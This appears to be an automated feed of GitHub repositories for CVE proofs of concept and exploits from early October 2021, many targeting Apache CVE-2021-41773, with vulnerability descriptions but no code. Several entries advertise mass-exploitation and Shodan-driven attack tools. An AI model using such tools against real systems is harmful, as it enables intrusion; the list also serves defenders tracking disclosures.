This a simple poc for Apache/2.4.49 Path Traversal Vulnerability : shellreaper/CVE-2021-41773 create time: 2021-10-08T01:13:33Z
Docker container lab to play/learn with CVE-2021-41773 : htrgouvea/lab-cve-2021-41773 create time: 2021-10-07T23:38:36Z
CVE-2021-26084 - Confluence Server Webwork OGNL injection : oxctdev/CVE-2021-26084 create time: 2021-10-06T23:24:24Z
Mass exploitation CVE-2021-41773 and auto detect possible RCE : Sakura-nee/CVE-2021-41773 create time: 2021-10-07T21:37:50Z
Aviatrix allows an authenticated user to execute arbitrary code : oxctdev/CVE-2021-40870 create time: 2021-10-07T21:34:00Z
MASS CVE-2021-41773 : justakazh/mass_cve-2021-41773 create time: 2021-10-07T15:13:18Z
Exploit with integrated shodan search : andrea-mattioli/apache-exploit-CVE-2021-42013 create time: 2021-10-07T18:31:29Z
no description : 0xAgun/CVE-2021-40870 create time: 2021-10-07T17:19:12Z
Simple script realizado en bash, para revisión de múltiples hosts para CVE-2021-41773 (Apache) : jheeree/Simple-CVE-2021-41773-checker create time: 2021-10-06T23:32:30Z
no description : LetouRaphael/Poc-CVE-2021-41773 create time: 2021-10-07T16:19:45Z
Apache 2.4.49 : AssassinUKG/CVE-2021-41773 create time: 2021-10-06T21:37:18Z
exploit to CVE-2021-41773 : n3k00n3/CVE-2021-41773 create time: 2021-10-06T19:39:25Z
Denial of Service tool for Wowza Streaming Engine <= 4.8.11+5 - Uncontrolled Resource Consumption (CVE-2021-35492) : N4nj0/CVE-2021-35492 create time: 2021-10-06T20:53:00Z
no description : zeroc00I/CVE-2021-26085 create time: 2021-10-06T20:03:22Z
no description : fnatalucci/CVE-2021-41773-RCE create time: 2021-10-06T19:50:33Z
Metasploit-Framework modules (scanner and exploit) for the CVE-2021-41773 (Path Traversal in Apache 2.4.49) : Zeop-CyberSec/apache_normalize_path create time: 2021-10-06T14:58:27Z
Local and Remote scan for shellshock vulnerability for Bash versions lower than 4.3. [CVE-2014-6271].* : 0bfxgh0st/ShellShock create time: 2021-10-06T15:20:40Z
no description : r00tVen0m/CVE-2021-41773 create time: 2021-10-06T16:15:21Z
no description : BlueTeamSteve/CVE-2021-41773 create time: 2021-10-06T14:47:23Z
no description : ranggaggngntt/CVE-2021-41773 create time: 2021-10-06T14:36:05Z
CVE-2021-41773 的复现 : 1nhann/CVE-2021-41773 create time: 2021-10-06T14:17:31Z
no description : mohwahyudi/cve-2021-41773 create time: 2021-10-06T14:12:07Z
Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773) : jbovet/CVE-2021-41773 create time: 2021-10-06T13:39:57Z
PoC of CVE-2021-35296 - PTCL Modem HG150-Ub : afaq1337/CVE-2021-35296 create time: 2021-09-30T18:18:27Z
Sample exploits for Zephyr CVE-2021-3625 : szymonh/zephyr_cve-2021-3625 create time: 2021-10-06T12:47:24Z
no description : nisdn/CVE-2021-40978 create time: 2021-10-04T01:36:17Z
Path Traversal vulnerability in Apache 2.4.49 : PentesterGuruji/CVE-2021-41773 create time: 2021-10-06T10:04:22Z
CVE-2021-41773 playground : blasty/CVE-2021-41773 create time: 2021-10-06T07:17:05Z
CVE-2021-41773 : creadpag/CVE-2021-41773-POC create time: 2021-10-06T05:34:48Z
CVE-2021-41773.nse : TishcaTpx/cve-2021-41773-nse create time: 2021-10-06T05:22:42Z
CVE-2021-41773.nse : creadpag/cve-2021-41773-nse create time: 2021-10-06T05:12:07Z
CVE-2018-11235 : bstanley754/demo-ptlab-2 create time: 2021-10-06T04:16:14Z
no description : hh-hunter/cve-2021-24499 create time: 2021-10-06T03:07:31Z
PoC for CVE-2021-41773 with docker to demonstrate : habibiefaried/CVE-2021-41773-PoC create time: 2021-10-06T03:01:41Z
CVE-2021-41773 POC with Docker : itsecurityco/CVE-2021-41773 create time: 2021-10-06T02:30:40Z
no description : lsass-exe/CVE-2021-41773 create time: 2021-10-06T02:28:41Z
no description : lorddemon/CVE-2021-41773-PoC create time: 2021-10-05T23:53:48Z
bypass all stages of the password reset flow : oxctdev/CVE-2021-27651 create time: 2021-10-05T23:33:50Z
Microsoft Office Onenote 2007 (CVE-2014-2815) ".ONEPKG" File Directory Traversal Vulnerability Leads to Arbitrary Code Execution : Edubr2020/CABTrap_OneNote2007 create time: 2021-10-05T21:15:27Z
Poc.py : TishcaTpx/POC-CVE-2021-41773 create time: 2021-10-05T20:41:34Z
Exploitation of CVE-2021-41773 a Directory Traversal in Apache 2.4.49. : RyouYoo/CVE-2021-41773 create time: 2021-10-05T20:30:01Z
Working PowerShell POC : OppressionBreedsResistance/CVE-2021-1675-PrintNightmare create time: 2021-10-05T19:24:23Z
no description : masahiro331/CVE-2021-41773 create time: 2021-10-05T18:56:04Z
no description : iilegacyyii/PoC-CVE-2021-41773 create time: 2021-10-05T17:30:43Z
Light scan for ShellShock Vulnerability for Bash versions lower than 4.3. [CVE-2014-6271]* : 0bfxgh0st/shellshock-scan create time: 2021-10-05T17:53:51Z
POC: CVE-2019-12840 (Authenticated RCE - Webmin Package Updates) : WizzzStark/CVE-2019-12840.py create time: 2021-10-05T18:10:05Z
no description : hacknotes/CVE-2019-15107-Exploit create time: 2021-10-05T18:02:13Z
no description : ZephrFish/CVE-2021-41773-PoC create time: 2021-10-05T17:29:49Z
Path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773) : knqyf263/CVE-2021-41773 create time: 2021-10-05T16:45:41Z
CVE-2021-41773 : numanturle/CVE-2021-41773 create time: 2021-10-05T16:18:09Z
CVE-2021-41773 Path Traversal vulnerability in Apache 2.4.49. : Vulnmachines/cve-2021-41773 create time: 2021-10-05T16:13:38Z
PoC for exploiting CVE-2020-14119 : There is command injection in the addMeshNode interface of xqnetwork.lua, which leads to command execution under administrator authority on Xiaomi router AX3600 with rom versionrom< 1.1.12 : AIPOCAI/CVE-2020-14119 create time: 2021-10-05T11:17:13Z
PoC for exploiting CVE-2020-21482 : A cross-site scripting (XSS) vulnerability in RGCMS v1.06 allows attackers to obtain the administrator's cookie via a crafted payload in the Name field under the Message Board module : AIPOCAI/CVE-2020-21482 create time: 2021-10-05T11:16:54Z
PoC for exploiting CVE-2020-21481 : An arbitrary file upload vulnerability in RGCMS v1.06 allows attackers to execute arbitrary code via a crafted .txt file which is later changed to a PHP file. : AIPOCAI/CVE-2020-21481 create time: 2021-10-05T11:16:50Z
PoC for exploiting CVE-2020-14124 : There is a buffer overflow in librsa.so called by getwifipwdurl interface, resulting in code execution on Xiaomi router AX3600 with ROM version =rom< 1.1.12. : AIPOCAI/CVE-2020-14124 create time: 2021-10-05T11:16:39Z
PoC for exploiting CVE-2021-39204 : Pomerium is an open source identity-aware access proxy. Envoy, which Pomerium is based on, incorrectly handles resetting of HTTP/2 streams with excessive complexity. This can lead to high CPU utilization when a large number of streams are reset. This can result in a DoS condition. Pomerium versions 0.14.8 and 0.15.1 contain an upgraded envoy binary with this vulnerability patched. : AIPOCAI/CVE-2021-39204 create time: 2021-10-05T11:17:29Z
PoC for exploiting CVE-2021-39206 : Pomerium is an open source identity-aware access proxy. Envoy, which Pomerium is based on, contains two authorization related vulnerabilities CVE-2021-32777 and CVE-2021-32779. This may lead to incorrect routing or authorization policy decisions. With specially crafted requests, incorrect authorization or routing decisions may be made by Pomerium. Pomerium v0.14.8 and v0.15.1 contain an upgraded envoy binary with these vulnerabilities patched. This issue can only be triggered when using path prefix based policy. Removing any such policies should provide mitigation. : AIPOCAI/CVE-2021-39206 create time: 2021-10-05T11:17:25Z
PoC for exploiting CVE-2021-22005 : The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file. : AIPOCAI/CVE-2021-22005 create time: 2021-10-05T11:17:21Z
PoC for exploiting CVE-2021-40965 : A Cross-Site Request Forgery (CSRF) vulnerability exists in TinyFileManager all version up to and including 2.4.6 that allows attackers to upload files and run OS commands by inducing the Administrator user to browse a URL controlled by an attacker. : AIPOCAI/CVE-2021-40965 create time: 2021-10-05T11:17:17Z
PoC for exploiting CVE-2021-39201 : WordPress is a free and open-source content management system written in PHP and paired with a MySQL or MariaDB database. ### Impact The issue allows an authenticated but low-privileged user (like contributor/author) to execute XSS in the editor. This bypasses the restrictions imposed on users who do not have the permission to post unfiltered_html. ### Patches This has been patched in WordPress 5.8, and will be pushed to older versions via minor releases (automatic updates). It's strongly recommended that you keep auto-updates enabled to receive the fix. ### References https://wordpress.org/news/category/releases/ https://hackerone.com/reports/1142140 ### For more information If you have any questions or comments about this advisory: * Open an issue in HackerOne : AIPOCAI/CVE-2021-39201 create time: 2021-10-05T11:17:09Z
PoC for exploiting CVE-2021-40966 : A Stored XSS exists in TinyFileManager All version up to and including 2.4.6 in /tinyfilemanager.php when the server is given a file that contains HTML and javascript in its name. A malicious user can upload a file with a malicious filename containing javascript code and it will run on any user browser when they access the server. : AIPOCAI/CVE-2021-40966 create time: 2021-10-05T11:17:05Z
PoC for exploiting CVE-2021-40964 : A Path Traversal vulnerability exists in TinyFileManager all version up to and including 2.4.6 that allows attackers to upload a file (with Admin credentials or with the CSRF vulnerability) with the "fullpath" parameter containing path traversal strings (../ and ..) in order to escape the server's intended working directory and write malicious files onto any directory on the computer. : AIPOCAI/CVE-2021-40964 create time: 2021-10-05T11:17:01Z
PoC for exploiting CVE-2021-33693 : SAP Cloud Connector, version - 2.0, allows an authenticated administrator to modify a configuration file to inject malicious codes that could potentially lead to OS command execution. : AIPOCAI/CVE-2021-33693 create time: 2021-10-05T11:16:58Z
PoC for exploiting CVE-2021-24620 : The WordPress Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal plugin through 2.2.5 does not check for the uploaded Downloadable Digital product file, allowing any file, such as PHP to be uploaded by an administrator. Furthermore, as there is no CSRF in place, attackers could also make a logged admin upload a malicious PHP file, which would lead to RCE : AIPOCAI/CVE-2021-24620 create time: 2021-10-05T11:16:46Z
PoC for exploiting CVE-2021-39239 : A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server. : AIPOCAI/CVE-2021-39239 create time: 2021-10-05T11:16:42Z
PoC for exploiting CVE-2021-21993 : The vCenter Server contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in vCenter Server Content Library. An authorised user with access to content library may exploit this issue by sending a POST request to vCenter Server leading to information disclosure. : AIPOCAI/CVE-2021-21993 create time: 2021-10-05T11:16:31Z
PoC for exploiting CVE-2006-4471 : The Admin Upload Image functionality in Joomla! before 1.0.11 allows remote authenticated users to upload files outside of the /images/stories/ directory via unspecified vectors. : AIPOCAI/CVE-2006-4471 create time: 2021-10-05T10:36:17Z
PoC for exploiting CVE-2008-4796 : The _httpsrequest function (Snoopy/Snoopy.class.php) in Snoopy 1.2.3 and earlier, as used in (1) ampache, (2) libphp-snoopy, (3) mahara, (4) mediamate, (5) opendb, (6) pixelpost, and possibly other products, allows remote attackers to execute arbitrary commands via shell metacharacters in https URLs. : AIPOCAI/CVE-2008-4796 create time: 2021-10-05T10:53:26Z
PoC for exploiting CVE-2021-33701 : DMIS Mobile Plug-In or SAP S/4HANA, versions - DMIS 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710, 2011_1_730, 710, 2011_1_731, 710, 2011_1_752, 2020, SAPSCORE 125, S4CORE 102, 102, 103, 104, 105, allows an attacker with access to highly privileged account to execute manipulated query in NDZT tool to gain access to Superuser account, leading to SQL Injection vulnerability, that highly impacts systems Confidentiality, Integrity and Availability. : AIPOCAI/CVE-2021-33701 create time: 2021-10-05T10:33:44Z
PoC for exploiting CVE-2012-0881 : Apache Xerces2 Java Parser before 2.12.0 allows remote attackers to cause a denial of service (CPU consumption) via a crafted message to an XML service, which triggers hash table collisions. : AIPOCAI/CVE-2012-0881 create time: 2021-10-05T11:05:16Z
PoC for exploiting CVE-2020-20128 : LaraCMS v1.0.1 transmits sensitive information in cleartext which can be intercepted by attackers. : AIPOCAI/CVE-2020-20128 create time: 2021-10-05T10:38:20Z
PoC for exploiting CVE-2020-20129 : LaraCMS v1.0.1 contains a stored cross-site scripting (XSS) vulnerability which allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the content editor. : AIPOCAI/CVE-2020-20129 create time: 2021-10-05T10:38:16Z
PoC for exploiting CVE-2020-20131 : LaraCMS v1.0.1 contains a stored cross-site scripting (XSS) vulnerability which allows atackers to execute arbitrary web scripts or HTML via a crafted payload in the page management module. : AIPOCAI/CVE-2020-20131 create time: 2021-10-05T10:38:12Z
PoC for exploiting CVE-2014-4611 : Integer overflow in the LZ4 algorithm implementation, as used in Yann Collet LZ4 before r118 and in the lz4_uncompress function in lib/lz4/lz4_decompress.c in the Linux kernel before 3.15.2, on 32-bit platforms might allow context-dependent attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted Literal Run that would be improperly handled by programs not complying with an API limitation, a different vulnerability than CVE-2014-4715. : AIPOCAI/CVE-2014-4611 create time: 2021-10-05T11:12:15Z
PoC for exploiting CVE-2014-3704 : The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys. : AIPOCAI/CVE-2014-3704 create time: 2021-10-05T11:02:27Z
PoC for exploiting CVE-2016-2568 : pkexec, when used with --user nonpriv, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer. : AIPOCAI/CVE-2016-2568 create time: 2021-10-05T11:03:34Z
PoC for exploiting CVE-2016-5385 : PHP through 7.0.8 does not attempt to address RFC 3875 section 4.1.18 namespace conflicts and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, as demonstrated by (1) an application that makes a getenv('HTTP_PROXY') call or (2) a CGI configuration of PHP, aka an "httpoxy" issue. : AIPOCAI/CVE-2016-5385 create time: 2021-10-05T11:00:29Z
PoC for exploiting CVE-2016-10045 : The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033. : AIPOCAI/CVE-2016-10045 create time: 2021-10-05T10:53:01Z
PoC for exploiting CVE-2016-10033 : The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property. : AIPOCAI/CVE-2016-10033 create time: 2021-10-05T10:52:57Z
PoC for exploiting CVE-2016-20012 : OpenSSH through 8.7 allows remote attackers, who have a suspicion that a certain combination of username and public key is known to an SSH server, to test whether this suspicion is correct. This occurs because a challenge is sent only when that combination could be valid for a login session. : AIPOCAI/CVE-2016-20012 create time: 2021-10-05T10:51:32Z
PoC for exploiting CVE-2017-11189 : unrarlib.c in unrar-free 0.0.1 might allow remote attackers to cause a denial of service (NULL pointer dereference and application crash), which could be relevant if unrarlib is used as library code for a long-running application. NOTE: one of the several test cases in the references may be the same as what was separately reported as CVE-2017-14121. : AIPOCAI/CVE-2017-11189 create time: 2021-10-05T10:55:53Z
PoC for exploiting CVE-2017-14121 : The DecodeNumber function in unrarlib.c in unrar 0.0.1 (aka unrar-free or unrar-gpl) suffers from a NULL pointer dereference flaw triggered by a crafted RAR archive. NOTE: this may be the same as one of the several test cases in the CVE-2017-11189 references. : AIPOCAI/CVE-2017-14121 create time: 2021-10-05T10:55:49Z
PoC for exploiting CVE-2017-12678 : In TagLib 1.11.1, the rebuildAggregateFrames function in id3v2framefactory.cpp has a pointer to cast vulnerability, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted audio file. : AIPOCAI/CVE-2017-12678 create time: 2021-10-05T10:50:46Z
PoC for exploiting CVE-2018-16177 : Untrusted search path vulnerability in The installer of Windows 10 Fall Creators Update Modify module for Security Measures tool allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory. : AIPOCAI/CVE-2018-16177 create time: 2021-10-05T11:03:31Z
PoC for exploiting CVE-2018-14773 : An issue was discovered in Http Foundation in Symfony 2.7.0 through 2.7.48, 2.8.0 through 2.8.43, 3.3.0 through 3.3.17, 3.4.0 through 3.4.13, 4.0.0 through 4.0.13, and 4.1.0 through 4.1.2. It arises from support for a (legacy) IIS header that lets users override the path in the request URL via the X-Original-URL or X-Rewrite-URL HTTP request header. These headers are designed for IIS support, but it's not verified that the server is in fact running IIS, which means anybody who can send these requests to an application can trigger this. This affects \Symfony\Component\HttpFoundation\Request::prepareRequestUri() where X-Original-URL and X_REWRITE_URL are both used. The fix drops support for these methods so that they cannot be used as attack vectors such as web cache poisoning. : AIPOCAI/CVE-2018-14773 create time: 2021-10-05T11:00:25Z
PoC for exploiting CVE-2018-5729 : MIT krb5 1.6 or later allows an authenticated kadmin with permission to add principals to an LDAP Kerberos database to cause a denial of service (NULL pointer dereference) or bypass a DN container check by supplying tagged data that is internal to the database module. : AIPOCAI/CVE-2018-5729 create time: 2021-10-05T10:51:03Z
PoC for exploiting CVE-2018-5730 : MIT krb5 1.6 or later allows an authenticated kadmin with permission to add principals to an LDAP Kerberos database to circumvent a DN containership check by supplying both a "linkdn" and "containerdn" database argument, or by supplying a DN string which is a left extension of a container DN string but is not hierarchically within the container DN. : AIPOCAI/CVE-2018-5730 create time: 2021-10-05T10:50:59Z
PoC for exploiting CVE-2018-20217 : A Reachable Assertion issue was discovered in the KDC in MIT Kerberos 5 (aka krb5) before 1.17. If an attacker can obtain a krbtgt ticket using an older encryption type (single-DES, triple-DES, or RC4), the attacker can crash the KDC by making an S4U2Self request. : AIPOCAI/CVE-2018-20217 create time: 2021-10-05T10:50:55Z
PoC for exploiting CVE-2018-11439 : The TagLib::Ogg::FLAC::File::scan function in oggflacfile.cpp in TagLib 1.11.1 allows remote attackers to cause information disclosure (heap-based buffer over-read) via a crafted audio file. : AIPOCAI/CVE-2018-11439 create time: 2021-10-05T10:50:42Z
PoC for exploiting CVE-2019-11595 : In uBlock before 0.9.5.15, the $rewrite filter option allows filter-list maintainers to run arbitrary code in a client-side session when a web service loads a script for execution using XMLHttpRequest or Fetch, and the script origin has an open redirect. : AIPOCAI/CVE-2019-11595 create time: 2021-10-05T11:16:23Z
PoC for exploiting CVE-2019-18413 : In TypeStack class-validator 0.10.2, validate() input validation can be bypassed because certain internal attributes can be overwritten via a conflicting name. Even though there is an optional forbidUnknownValues parameter that can be used to reduce the risk of this bypass, this option is not documented and thus most developers configure input validation in the vulnerable default manner. With this vulnerability, attackers can launch SQL Injection or XSS attacks by injecting arbitrary malicious input. NOTE: a software maintainer agrees with the "is not documented" finding but suggests that much of the responsibility for the risk lies in a different product. : AIPOCAI/CVE-2019-18413 create time: 2021-10-05T11:12:08Z
PoC for exploiting CVE-2019-10095 : bash command injection vulnerability in Apache Zeppelin allows an attacker to inject system commands into Spark interpreter settings. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions. : AIPOCAI/CVE-2019-10095 create time: 2021-10-05T11:11:55Z
PoC for exploiting CVE-2019-9060 : An issue was discovered in CMS Made Simple 2.2.8. It is possible to achieve unauthenticated path traversal in the CGExtensions module (in the file action.setdefaulttemplate.php) with the m1_filename parameter; and through the action.showmessage.php file, it is possible to read arbitrary file content (by using that path traversal with m1_prefname set to cg_errormsg and m1_resettodefault=1). : AIPOCAI/CVE-2019-9060 create time: 2021-10-05T11:05:51Z
PoC for exploiting CVE-2019-0227 : A Server Side Request Forgery (SSRF) vulnerability affected the Apache Axis 1.4 distribution that was last released in 2006. Security and bug commits commits continue in the projects Axis 1.x Subversion repository, legacy users are encouraged to build from source. The successor to Axis 1.x is Axis2, the latest version is 1.7.9 and is not vulnerable to this issue. : AIPOCAI/CVE-2019-0227 create time: 2021-10-05T11:03:43Z
PoC for exploiting CVE-2019-12823 : Craft CMS before 3.1.31 does not properly filter XML feeds and thus allowing XSS. : AIPOCAI/CVE-2019-12823 create time: 2021-10-05T11:03:19Z
PoC for exploiting CVE-2019-3820 : It was discovered that the gnome-shell lock screen since version 3.15.91 did not properly restrict all contextual actions. An attacker with physical access to a locked workstation could invoke certain keyboard shortcuts, and potentially other actions. : AIPOCAI/CVE-2019-3820 create time: 2021-10-05T11:02:19Z
PoC for exploiting CVE-2019-10910 : In Symfony before 2.7.51, 2.8.x before 2.8.50, 3.x before 3.4.26, 4.x before 4.1.12, and 4.2.x before 4.2.7, when service ids allow user input, this could allow for SQL Injection and remote code execution. This is related to symfony/dependency-injection. : AIPOCAI/CVE-2019-10910 create time: 2021-10-05T11:00:17Z
PoC for exploiting CVE-2019-10911 : In Symfony before 2.7.51, 2.8.x before 2.8.50, 3.x before 3.4.26, 4.x before 4.1.12, and 4.2.x before 4.2.7, a vulnerability would allow an attacker to authenticate as a privileged user on sites with user registration and remember me login functionality enabled. This is related to symfony/security. : AIPOCAI/CVE-2019-10911 create time: 2021-10-05T11:00:13Z
PoC for exploiting CVE-2018-8256 : A remote code execution vulnerability exists when PowerShell improperly handles specially crafted files, aka "Microsoft PowerShell Remote Code Execution Vulnerability." This affects Windows RT 8.1, PowerShell Core 6.0, Microsoft.PowerShell.Archive 1.2.2.0, Windows Server 2016, Windows Server 2012, Windows Server 2008 R2, Windows Server 2019, Windows 7, Windows Server 2012 R2, PowerShell Core 6.1, Windows 10 Servers, Windows 10, Windows 8.1. : AIPOCAI/CVE-2018-8256 create time: 2021-10-05T10:53:06Z
PoC for exploiting CVE-2019-19797 : read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. : AIPOCAI/CVE-2019-19797 create time: 2021-10-05T10:37:13Z
PoC for exploiting CVE-2021-39862 : Adobe Framemaker versions 2019 Update 8 (and earlier) and 2020 Release Update 2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. : AIPOCAI/CVE-2021-39862 create time: 2021-10-05T10:34:43Z
PoC for exploiting CVE-2021-40697 : Adobe Framemaker versions 2019 Update 8 (and earlier) and 2020 Release Update 2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. : AIPOCAI/CVE-2021-40697 create time: 2021-10-05T10:33:56Z
PoC for exploiting CVE-2021-39865 : Adobe Framemaker versions 2019 Update 8 (and earlier) and 2020 Release Update 2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. : AIPOCAI/CVE-2021-39865 create time: 2021-10-05T10:33:52Z
PoC for exploiting CVE-2019-7254 : Linear eMerge E3-Series devices allow File Inclusion. : AIPOCAI/CVE-2019-7254 create time: 2021-10-05T10:32:37Z
PoC for exploiting CVE-2020-21480 : An arbitrary file write vulnerability in RGCMS v1.06 allows attackers to execute arbitrary code via a crafted PHP file. : AIPOCAI/CVE-2020-21480 create time: 2021-10-05T11:16:35Z
PoC for exploiting CVE-2020-21605 : libde265 v1.0.4 contains a segmentation fault in the apply_sao_internal function, which can be exploited via a crafted a file. : AIPOCAI/CVE-2020-21605 create time: 2021-10-05T11:16:27Z
PoC for exploiting CVE-2020-21606 : libde265 v1.0.4 contains a heap buffer overflow fault in the put_epel_16_fallback function, which can be exploited via a crafted a file. : AIPOCAI/CVE-2020-21606 create time: 2021-10-05T11:15:30Z
PoC for exploiting CVE-2020-21601 : libde265 v1.0.4 contains a stack buffer overflow in the put_qpel_fallback function, which can be exploited via a crafted a file. : AIPOCAI/CVE-2020-21601 create time: 2021-10-05T11:15:22Z
PoC for exploiting CVE-2020-21602 : libde265 v1.0.4 contains a heap buffer overflow in the put_weighted_bipred_16_fallback function, which can be exploited via a crafted a file. : AIPOCAI/CVE-2020-21602 create time: 2021-10-05T11:15:13Z
PoC for exploiting CVE-2020-21604 : libde265 v1.0.4 contains a heap buffer overflow fault in the _mm_loadl_epi64 function, which can be exploited via a crafted a file. : AIPOCAI/CVE-2020-21604 create time: 2021-10-05T11:15:09Z
PoC for exploiting CVE-2020-21603 : libde265 v1.0.4 contains a heap buffer overflow in the put_qpel_0_0_fallback_16 function, which can be exploited via a crafted a file. : AIPOCAI/CVE-2020-21603 create time: 2021-10-05T11:15:05Z
PoC for exploiting CVE-2020-21597 : libde265 v1.0.4 contains a heap buffer overflow in the mc_chroma function, which can be exploited via a crafted a file. : AIPOCAI/CVE-2020-21597 create time: 2021-10-05T11:14:59Z
PoC for exploiting CVE-2020-21598 : libde265 v1.0.4 contains a heap buffer overflow in the ff_hevc_put_unweighted_pred_8_sse function, which can be exploited via a crafted a file. : AIPOCAI/CVE-2020-21598 create time: 2021-10-05T11:14:55Z
PoC for exploiting CVE-2020-21599 : libde265 v1.0.4 contains a heap buffer overflow in the de265_image::available_zscan function, which can be exploited via a crafted a file. : AIPOCAI/CVE-2020-21599 create time: 2021-10-05T11:14:51Z
PoC for exploiting CVE-2020-21600 : libde265 v1.0.4 contains a heap buffer overflow in the put_weighted_pred_avg_16_fallback function, which can be exploited via a crafted a file. : AIPOCAI/CVE-2020-21600 create time: 2021-10-05T11:14:48Z
PoC for exploiting CVE-2020-21594 : libde265 v1.0.4 contains a heap buffer overflow in the put_epel_hv_fallback function, which can be exploited via a crafted a file. : AIPOCAI/CVE-2020-21594 create time: 2021-10-05T11:14:44Z
PoC for exploiting CVE-2020-21596 : libde265 v1.0.4 contains a global buffer overflow in the decode_CABAC_bit function, which can be exploited via a crafted a file. : AIPOCAI/CVE-2020-21596 create time: 2021-10-05T11:14:40Z
PoC for exploiting CVE-2020-21595 : libde265 v1.0.4 contains a heap buffer overflow in the mc_luma function, which can be exploited via a crafted a file. : AIPOCAI/CVE-2020-21595 create time: 2021-10-05T11:14:37Z
PoC for exploiting CVE-2020-24574 : The client (aka GalaxyClientService.exe) in GOG GALAXY through 2.0.41 (as of 12:58 AM Eastern, 9/26/21) allows local privilege escalation from any authenticated user to SYSTEM by instructing the Windows service to execute arbitrary commands. This occurs because the attacker can inject a DLL into GalaxyClient.exe, defeating the TCP-based "trusted client" protection mechanism. : AIPOCAI/CVE-2020-24574 create time: 2021-10-05T11:13:20Z
PoC for exploiting CVE-2020-3960 : VMware ESXi (6.7 before ESXi670-202006401-SG and 6.5 before ESXi650-202005401-SG), Workstation (15.x before 15.5.5), and Fusion (11.x before 11.5.5) contain an out-of-bounds read vulnerability in NVMe functionality. A malicious actor with local non-administrative access to a virtual machine with a virtual NVMe controller present may be able to read privileged information contained in physical memory. : AIPOCAI/CVE-2020-3960 create time: 2021-10-05T11:12:57Z
PoC for exploiting CVE-2020-13929 : Authentication bypass vulnerability in Apache Zeppelin allows an attacker to bypass Zeppelin authentication mechanism to act as another user. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions. : AIPOCAI/CVE-2020-13929 create time: 2021-10-05T11:11:59Z
PoC for exploiting CVE-2021-40155 : A maliciously crafted DWG file in Autodesk Navisworks 2019, 2020, 2021, 2022 can be forced to read beyond allocated boundaries when parsing the DWG files. This vulnerability can be exploited to execute arbitrary code. : AIPOCAI/CVE-2021-40155 create time: 2021-10-05T11:11:43Z
PoC for exploiting CVE-2021-40156 : A maliciously crafted DWG file in Autodesk Navisworks 2019, 2020, 2021, 2022 can be forced to write beyond allocated boundaries when parsing the DWG files. This vulnerability can be exploited to execute arbitrary code. : AIPOCAI/CVE-2021-40156 create time: 2021-10-05T11:11:39Z
PoC for exploiting CVE-2020-21321 : emlog v6.0 contains a Cross-Site Request Forgery (CSRF) via /admin/link.php?action=addlink, which allows attackers to arbitrarily add articles. : AIPOCAI/CVE-2020-21321 create time: 2021-10-05T11:09:43Z
PoC for exploiting CVE-2020-21322 : An arbitrary file upload vulnerability in Feehi CMS v2.0.8 and below allows attackers to execute arbitrary code via a crafted PHP file. : AIPOCAI/CVE-2020-21322 create time: 2021-10-05T11:09:32Z
PoC for exploiting CVE-2020-21483 : An arbitrary file upload vulnerability in Jizhicms v1.5 allows attackers to execute arbitrary code via a crafted .jpg file which is later changed to a PHP file. : AIPOCAI/CVE-2020-21483 create time: 2021-10-05T11:09:05Z
PoC for exploiting CVE-2020-21121 : Pligg CMS 2.0.2 contains a time-based SQL injection vulnerability via the $recordIDValue parameter in the admin_update_module_widgets.php file. : AIPOCAI/CVE-2020-21121 create time: 2021-10-05T11:08:52Z
PoC for exploiting CVE-2020-21122 : UReport v2.2.9 contains a Server-Side Request Forgery (SSRF) in the designer page which allows attackers to detect intranet device ports. : AIPOCAI/CVE-2020-21122 create time: 2021-10-05T11:08:44Z
PoC for exploiting CVE-2020-21124 : UReport 2.2.9 allows attackers to execute arbitrary code due to a lack of access control to the designer page. : AIPOCAI/CVE-2020-21124 create time: 2021-10-05T11:08:40Z
PoC for exploiting CVE-2020-21125 : An arbitrary file creation vulnerability in UReport 2.2.9 allows attackers to execute arbitrary code. : AIPOCAI/CVE-2020-21125 create time: 2021-10-05T11:08:25Z
PoC for exploiting CVE-2021-27045 : A maliciously crafted PDF file in Autodesk Navisworks 2019, 2020, 2021, 2022 can be forced to read beyond allocated boundaries when parsing the PDF file. This vulnerability can be exploited to execute arbitrary code. : AIPOCAI/CVE-2021-27045 create time: 2021-10-05T11:08:10Z
